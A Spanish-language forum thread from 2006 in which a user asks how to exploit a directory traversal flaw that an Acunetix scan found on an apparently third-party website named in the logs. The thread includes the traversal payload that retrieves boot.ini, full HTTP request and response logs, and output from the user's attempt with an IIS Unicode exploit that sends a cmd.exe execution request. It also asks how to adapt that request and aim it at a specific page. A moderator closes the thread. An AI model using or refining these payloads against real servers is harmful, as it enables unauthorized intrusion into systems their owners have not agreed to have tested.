Hola gente miren estuve con el acuentix y vi en una web que tiene Directory transversal(Windows) y me dice que el parametro es el siguiente:
forma=../../../../../../../../boot.ini%00&Submit=Ver

Y dp lanza

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


Yo lei que este ataque puede ser muy peligroso ya que puede manipular los datos del servidor.
Y estuve viendo por el foro y por documentacion y no encontre mucho sorbe Directory Transversal.
Asi que si me podrian decir bien que puede hacer este ataque verdaderamente y como poder explotarlo y solucionarlo.

Aca entra un juego de Unicode Traversal PERO POR LO QUE VEO el servidor es win 2003 y este exploit hace mension hacia win2k, por lo que digo no creo que se esa trasversal. Estuve buscando y no hay niguna bug En WIN 2003 para hacer explotar este tipo de bug.

En
http://www.securityfocus.com/bid/1806/exploit
habla del Unicode Trasversal y libera el exploit para saber si es vulernable o no trate de lanzar el exploit q por cierto viene compilado pero parece que no vaya ni para atras ni para adelante el que tiene tiempo porfavor bajase el exploit de UNICODe y digame como mandan los parametros.

Details The script has been tested with these POST variables:
forma=../../../../../../../../boot.ini%00&Submit=Ver
 
Severity high 
Type Validation
Description This script is possibly vulnerable to directory traversal attacks.
Impact A malicious user may access files in areas of the filesystem that should be unavailabale.
Recommendation Your script should filter metacharacters from user input.
Reported by module Parameter manipulation
References
  iMPERVA Directory Traversal
Security Focus - Penetration Testing for Web Applications (Part Two)
 
 View HTTP headers 
Request POST /es/skin_ranking.html HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: tds.patan.com.ar
Content-Length: 52
Cookie: PHPSESSID=m4d4rpb3pr42haorfv32roq5a3
Connection: Close
Acunetix-Product: WVS/2.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

forma=../../../../../../../../boot.ini%00&Submit=Ver
 
Response HTTP/1.0 200 OK
Date: Fri, 24 Feb 2006 04:51:07 GMT
Content-Type: text/html
Server: Apache/2.0.55 (Win32) PHP/5.1.2
X-Powered-By: PHP/5.1.2
 
 
 View HTML response 

Eso es todo a ver si les sirve algo para ayudarme en algo please.


Envie El Explit decode hacia el server y me tiro:

by optyx and t12
]- Target -XXX.XXX.XXX:80
]- Command - boot.ini
]- Timeout - 3 seconds
]- Sending request: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+boot.ini

]- Getting results
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /scripts/..À¯../winnt/system32/cmd.exe was not found on thi
s server.</p>
<hr>
<address>Apache/2.0.55 (Win32) PHP/5.1.2 Server at XXX.XXX.XXX.XXX Port 80</address
>
</body></html>

Y como que no va que no es un exploit DECODE.

Sera Un nuevo Trasversal deWindows 2003 server proque no vi en niguna web de trasversal de ese S.O

CONCLUSION: TODOS LOS ERRORES DE TRASVERSAL QUE HABLAN LAS WEB TAN ORIENTADOS A WIN2k ya que todo exploit busca la CMD dentro de WINNT o demas.

Sep aparte de eso tambien le tendria que cambiar que se envie por Post porque el exploit  lo envia por get xD

Una pregunta el Win2000 tambien posee los mismos Dir que win2003 en este caso EJ:

"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+";

Si lo remplazo por

"POST /scripts/..%c0%af../windows/system32/cmd.exe?/c+";

Seria asi no mas?....

Ahora el  trasversal el acuentix me lo encuentra sobe una WEB en especial. No sobre todas las webs.

Como aclaro hacia donde tiene que  disparar el exploit?

En el acuentix me tira lo siguiente:

. Directory traversal (Windows)
Affects /es/skin_ranking.html
Details The script has been tested with these POST variables:
forma=../../../../../../../../boot.ini%00&Submit=Ver
 
Severity high 
Type Validation
Description This script is possibly vulnerable to directory traversal attacks.
Impact A malicious user may access files in areas of the filesystem that should be unavailabale.
Recommendation Your script should filter metacharacters from user input.
Reported by module Parameter manipulation
References
  iMPERVA Directory Traversal
Security Focus - Penetration Testing for Web Applications (Part Two)
 
 View HTTP headers 
Request POST /es/skin_ranking.html HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: tds.patan.com.ar
Content-Length: 52
Cookie: PHPSESSID=h33c823l8o3s2c4nv8mjuvfqi2
Connection: Close
Acunetix-Product: WVS/2.0 (Acunetix Web Vulnerability Scanner - PROFESSIONAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

forma=../../../../../../../../boot.ini%00&Submit=Ver
 
Response HTTP/1.0 200 OK
Date: Fri, 03 Mar 2006 17:55:15 GMT
Content-Type: text/html
Server: Apache/2.0.55 (Win32) PHP/5.1.2
X-Powered-By: PHP/5.1.2
 
 
 View HTML response 

------------------------------0------------------------------

El error me marca en una pagina determinada donde pueda ser explotada el bug supongo.

Como le indico al exploit compilado que se lanze hacia esa pagina especifica?

Trato de explotar el bug de unicode hacia el servidor pero no me responde.
yo digo el Acunetix me marca que el bug esta sobre una web, no que esta sobre todo un servidor.
¿Como exploto el bug del servidor en esa determinada pagina?

/* editado sirdarckcat */

por ultima vez, el bug unicode es diferente, no te va a servir.

cierro el tema.